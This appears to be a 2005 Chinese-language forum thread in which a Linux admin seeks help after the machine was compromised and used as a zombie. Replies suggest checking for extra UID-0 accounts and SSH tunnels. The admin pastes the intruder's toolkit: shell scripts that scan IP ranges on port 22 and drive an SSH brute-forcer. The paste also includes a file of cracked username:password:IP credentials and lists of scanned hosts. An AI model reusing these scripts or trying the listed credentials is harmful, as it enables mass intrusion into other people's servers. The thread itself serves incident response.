偶的机器被国外的哥们做了肉鸡

lues · 发表于 2005-3-14 17:52:38

偶的机器被人黑了做了肉鸡，在他建的目录中有一下文件，我想问一下除了删除这些文件以外，还有没有被的办法(因为我怕他还留有别的后门)
[code:1][root@test11 ssh]# pwd
/home/test/ssh
[root@test11 ssh]# ls
131.234.pscan.22  211.234.pscan.22  assh  auto  -b.22.pscan.210.59.42.16  go.sh  pscan2  ss  sshf  vuln.txt

[root@test11 ssh]# ls
131.234.pscan.22  211.234.pscan.22  assh  auto  -b.22.pscan.210.59.42.16  go.sh  pscan2  ss  sshf  vuln.txt
[root@test11 ssh]# more assh
#!/bin/bash
if [ $# != 1 ]; then
      echo " usage: $0 <b class>"
      exit;
fi

echo "    Versiune de scaner privata!"
echo "----------------------------------------------------"
echo "          All my love for Liz!                   "
echo "----------------------------------------------------"
echo "# incep scanarea ..."
./pscan2 $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > uniq.txt
oopsnr2=`grep -c . uniq.txt`
echo "# Am gasit $oopsnr2 de servere"
echo "----------------------------------------"
echo "# Incepem..."
./sshf 50
rm -rf $1.pscan.22 uniq.txt
echo "Asta a fost tot"
[root@test11 ssh]# more auto
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
      echo -n "./assh $brange.$crange ; " >> $file
      let crange=crange+1
done

[root@test11 ssh]# more go.sh
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./sshf
rm -f bios.txt
[root@test11 ssh]# more pscan2

******** pscan2: Not a text file ********

[root@test11 ssh]# more ss

******** ss: Not a text file ********

[root@test11 ssh]# more ss
ss sshf
[root@test11 ssh]# more sshf

******** sshf: Not a text file ********

[root@test11 ssh]# more vuln.txt
test:test:198.247.172.38
test:test:198.247.172.34
test:test:198.247.172.40
test:test:198.247.172.37
test:test:198.247.172.33
test:test:198.247.172.42
test:test:198.247.172.35
test:test:198.247.172.39
test:test:198.247.172.36
test:test:198.247.172.41
root:shadow:131.234.103.116
DUP test:test:131.234.254.103
DUP root:present:131.234.254.103
DUP root:iloveyou:131.234.254.103
DUP root:hate:131.234.254.103
DUP root:loveyou:131.234.254.103
DUP root:love:131.234.254.103
DUP john:john:131.234.254.103
DUP henry:henry:131.234.254.103
DUP george:george:131.234.254.103
DUP frank:frank:131.234.254.103
DUP alan:alan:131.234.254.103
DUP adam:adam:131.234.254.103
DUP server:server:131.234.254.103
DUP backup:backup:131.234.254.103
DUP account:account:131.234.254.103
DUP master:master:131.234.254.103
DUP sybase:sybase:131.234.254.103
DUP oracle:oracle:131.234.254.103
DUP web:webmaster:131.234.254.103
DUP web:web:131.234.254.103
DUP user:user02:131.234.254.103
DUP user:user1:131.234.254.103
DUP user:user01:131.234.254.103
[root@test11 ssh]# more -b.22.pscan.210.59.42.16
more: unknown option "-b"
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 ...
[root@test11 ssh]# more 131.234.pscan.22
[root@test11 ssh]# more 211.234.pscan.22
211.234.11.67
211.234.11.71
211.234.20.3
211.234.20.2
211.234.35.127
211.234.44.249
211.234.45.41
211.234.45.130
211.234.48.2
211.234.48.13
211.234.48.25
211.234.48.52
211.234.48.100
211.234.48.136
211.234.48.145
211.234.48.146
211.234.48.164
211.234.48.194
211.234.48.214
211.234.52.111
211.234.52.115
211.234.52.155
211.234.52.158
211.234.52.159
211.234.52.166
211.234.52.169
211.234.52.183
211.234.53.113
211.234.58.195
211.234.59.249
211.234.61.71
211.234.61.9
211.234.61.10
211.234.63.37
[/code:1]
请问我除了删除这些文件还有什么好的办法没有

ajinn · 发表于 2005-3-14 19:08:07

偶不懂，不过

帮你顶

roly · 发表于 2005-3-15 11:31:56

你先删除了，过一段时间再看看是否又出来了，就知道了。另外，自己编个程序，在其他的机子上生成一个新的root密码，拷到shadow文件中，不要用passwd命令改root密码。

lues · 发表于 2005-3-15 17:37:23

我现在限定了能够ssh的用户，并用iptables拒绝了他的ip，但是有点奇怪，我的iptables封了他的ip，他还能够登陆

[root@test11 root]# iptables -L -n
Chain INPUT (policy ACCEPT)
target    prot opt source             destination
DROP    tcp  --  194.176.171.0/24    0.0.0.0/0
DROP    tcp  --  80.97.37.0/24       0.0.0.0/0       #我已经禁用了这段ip

Chain FORWARD (policy ACCEPT)
target    prot opt source             destination

Chain OUTPUT (policy ACCEPT)
target    prot opt source             destination

[root@test11 root]# last
test    pts/16    ip14.rtc.ro    Mon Mar 14 18:34 - 19:01  (00:27)
test    pts/10    ip14.rtc.ro    Mon Mar 14 18:34 - 19:01  (00:27)
test    pts/8       ip14.rtc.ro    Mon Mar 14 18:33 - 19:01  (00:2

test    pts/10    80.97.37.69    Mon Mar 14 18:04 - 18:04  (00:00)
test    pts/0       ip14.rtc.ro    Mon Mar 14 17:58 - 19:01  (01:03)
test    pts/9       ip14.rtc.ro    Mon Mar 14 17:55 - 19:21  (01:25)
test    pts/7       80.97.37.69    Mon Mar 14 17:49 - 19:36  (01:46)  #但是他还是能登陆

roly · 发表于 2005-4-20 12:16:23

代理进来的吧，或者是他自己使用了一个单独的登录机制，不用你的sshd

anthonywang · 发表于 2005-4-21 00:33:58

看看还有没有其他用户的uid,gid是0,0的

可能他第一次登录后,在你机子上放了一个建立ssh安全隧道的脚本

		自动登录	找回密码
密码			注册